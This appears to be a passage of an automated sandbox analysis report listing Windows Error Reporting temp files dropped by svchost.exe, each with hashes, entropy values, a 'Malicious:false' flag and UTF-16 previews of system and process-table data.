                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3074.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.696845379133945
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWLCFedpYMYymWCOHVYEZt5tFiF7SF0wVqkPnwaTHxzMXksIT2E:2ZDL9LVGkPwaTHlMXkrT2E
                                                                                                                                                                    MD5:8B6E9C69B2D32A26A74DD2C7FFEF070E
                                                                                                                                                                    SHA1:2DCFE417762425047D70987AFCFF03178AC5BC72
                                                                                                                                                                    SHA-256:FE9327CFDD4D51457876D2A706FB3786C913D13C3EAF53062C45A364679F2FCE
                                                                                                                                                                    SHA-512:D691685A74368AF9C8A724BA62A6C252AEDE243D1C7D309559C29366F47DE8B28AA2CF0C6F2E9E4C6ACFBAA05C0C65237F0B6609D8386979E4344F2B2F6F8FEB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3520.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90132
                                                                                                                                                                    Entropy (8bit):3.05606248100107
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:YnWgt1UHd136OA148596ZCZiF20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+mr:YnWgt1UHd136OA148596ZCZm20n+sI++
                                                                                                                                                                    MD5:0EBE1291788637DBD99C9EE048494DB9
                                                                                                                                                                    SHA1:ABC3B9F50FDFC0CF65C2D17D10E1111D8DF5EBDC
                                                                                                                                                                    SHA-256:004328ED312284BE5376E9D98A3CA5DEF68597DD6BBF32FA8737C101444B93A5
                                                                                                                                                                    SHA-512:A8914D812C5832379F6D5CEB9B6A56DCD5DEA090EBD0D91BC303363ED6B4FD08429884A024DB1666BDD66D4D5574D4504D7AD3B949B7BA78CA87F00DABA27F4F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER374B.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):93092
                                                                                                                                                                    Entropy (8bit):3.052334769198964
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:aiW728l3vjV2ugcuQBqrskY0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kU9:aiW728l3vjV2ugcuQBqrsJ0n+sI+E+oI
                                                                                                                                                                    MD5:70FEB05325E2F49B391CE8D46F7ED565
                                                                                                                                                                    SHA1:AC9A09C0CCD7CC1E454349A200F0C04314DACB10
                                                                                                                                                                    SHA-256:14F15BEA35CA28D24E1CF80D60B497D9C0B70AFFA6D3C9767C7458E9FEF505DD
                                                                                                                                                                    SHA-512:6C61665A4F2B1DFC93484415183ADE486033702F234379ABAAEB68B99E5B8E9ABA48C59AB8E97EC6E5E5CBE58A766AAC8E4DD52231BBC1E632152C0CA6A2CC8E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER38B3.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6966131988349393
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWLKhp2GEYKYWWvHVYEZTMtFip79FswrqNRzgU4adHzx7MlHk+I023:2ZDGODt6iDkDadHztM9kJ023
                                                                                                                                                                    MD5:AB6C5BCF4DACDB69C56BB361B4D50DE5
                                                                                                                                                                    SHA1:CF2CF2A50FFE0C5EE1EF60FC4086A7165EB21BDC
                                                                                                                                                                    SHA-256:37FE1E9FE02607873448E5DF256E0EEFAB036D4A867E49C173C892924F7BA1DF
                                                                                                                                                                    SHA-512:069D2F720C509358610CF072DCED8A6199D4DF94192A959DA85102763F88A047147C96E0314B70383ADA67F5A8ACB4628BCAB4B0A693E7742D901E4181306A05
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E68.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6853436611959123
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWLjYbebYjY4JW8HXYEZZAtFit7mp5wsn/a0dIVM63uIgPb3:2ZDcEknO/a0dIVM6356b3
                                                                                                                                                                    MD5:B11140FD427C1795742295F6221E7514
                                                                                                                                                                    SHA1:3AEABF3CA5156DB8EBABD4322A1580D00BEDE3CF
                                                                                                                                                                    SHA-256:5AF8F0977678DD04CDA30FA327AC9D964F7FE3F8C896451081E9A3525EA3E958
                                                                                                                                                                    SHA-512:555E2BE475D4A90EFFD8EEEE390B75A8C70D555F4E93BACA7C1C44D3A4F4A0247EECB13FD3FAC24CA83C254AC0D06C260DB47916B9906CD331D17A5E91C4AF21
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5361.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):93380
                                                                                                                                                                    Entropy (8bit):3.0520401342230277
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:H1skQgaGOLIVFugcUktBr/kAo0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+g:H1skQgaGOLIVFugcUktBr/Zo0n+sI+Ej
                                                                                                                                                                    MD5:79EF155161272E51C90F1B14DB1CF65E
                                                                                                                                                                    SHA1:6A3E823AF24876E414AB506F4C5D197AC1C4032D
                                                                                                                                                                    SHA-256:97B01223F53ACEF99362BDAFFECCD4575A3A6AF3778750CC72C0A0BC3916CC49
                                                                                                                                                                    SHA-512:1C7F2CCD5DB7A8AB74B0A8245BF97731193B4375337BF75A8B9395A382C5F2B89A18BFBE1B19F8D57D70E83B07089FF4306728FE78673C1274FC51647A474CAA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER549A.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.698160343049022
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWqX3i0dDqvYIYJD7YHVYEZS1VtFiT7lKF/waq1LFOUajHnHMykOI02I:2ZDsiK0PQ+yUajHHMykZ02I
                                                                                                                                                                    MD5:5C15D833E363B3D260145417238B9C21
                                                                                                                                                                    SHA1:94EEA9FD706D7DABAECCECE874E5792E7CA3AB62
                                                                                                                                                                    SHA-256:4CC5C27D01C70BF8DF8F1307FAD8681984D65ED7101634BF7D0824C823124557
                                                                                                                                                                    SHA-512:C5C245C834420D04217DE2CFD984D33B8CD13F0E783402E979AF535F6CBE4CFE3C5B07803E07F07ED2E9007824B54189EDBEDAD7A1002D2924338C649123824E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5694.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90596
                                                                                                                                                                    Entropy (8bit):3.055572506860903
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:1Mmyc7pdWxrA2Ci8zm6RXZiH20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+F:1Mmyc7pdWxrA2Ci8zm6RXZU20n+sI+ES
                                                                                                                                                                    MD5:BFEB3A2CFF3C505EC08B6730908F238D
                                                                                                                                                                    SHA1:0A21CF719E3A71E9623E3B7188B4BF6340AD657C
                                                                                                                                                                    SHA-256:894683EEB0A02A749210CED6A8DBA4A24EA1BE6EE430CEC5DF9B264B26087E20
                                                                                                                                                                    SHA-512:8424006B98D157EE9C4F105586FC313F36C928BA7B687D53640CC879E934199FCF8C0C4912ED1DE07192BC2681B0ED51061CF758A1D228108991D2FE16EBA686
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5906.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.685771765265821
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWZyvD5ZkYwYVWfZHbYEZxwtFik7c/YwaBwuOaBdrMeMa4IMB3:2ZDZDH9ABrOaBdrMeMafMB3
                                                                                                                                                                    MD5:121EC4D24CB5DE5395C2204A1270BB57
                                                                                                                                                                    SHA1:9CEFCBF46897F48E0C075512553BC60110577664
                                                                                                                                                                    SHA-256:5D9159A05888DE5AA71A33A627B75764DD07F77AD67E4F50DF65682397374861
                                                                                                                                                                    SHA-512:FEB4272734B25B7CCD7A3B37994EF16F14B671EDD24952F1D2B2850ED6AE550CD1ADD7920D37720B8C38DE4BDBB7F2E02129E4A87032D2FE3533443A3468D5EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C24.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):91400
                                                                                                                                                                    Entropy (8bit):3.0543327300582264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:ZP0Yy8ayd4mrAkiQNM6V8Zi920n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+e:ZP0Yy8ayd4mrAkiQNM6V8ZO20n+sI+Ep
                                                                                                                                                                    MD5:3B4DDEED0D9EC116974C8906E18BAB83
                                                                                                                                                                    SHA1:ABFA6836B64CE908F3B50EC962042B4CF76CEB08
                                                                                                                                                                    SHA-256:A593026131E68877F685DDE111793D06494C2D4EA44AD6FD923C4D13E6BEC404
                                                                                                                                                                    SHA-512:14D60780512218F3A37261E10C914810665D35C2B3F32973FFB2CF7A7DC09CB0948C1EA7920E4F114ECD585ECF40FD173CCD618DB0A7E15089378E2BFEAF7EDA
                                                                                                                                                                    Malicious:false
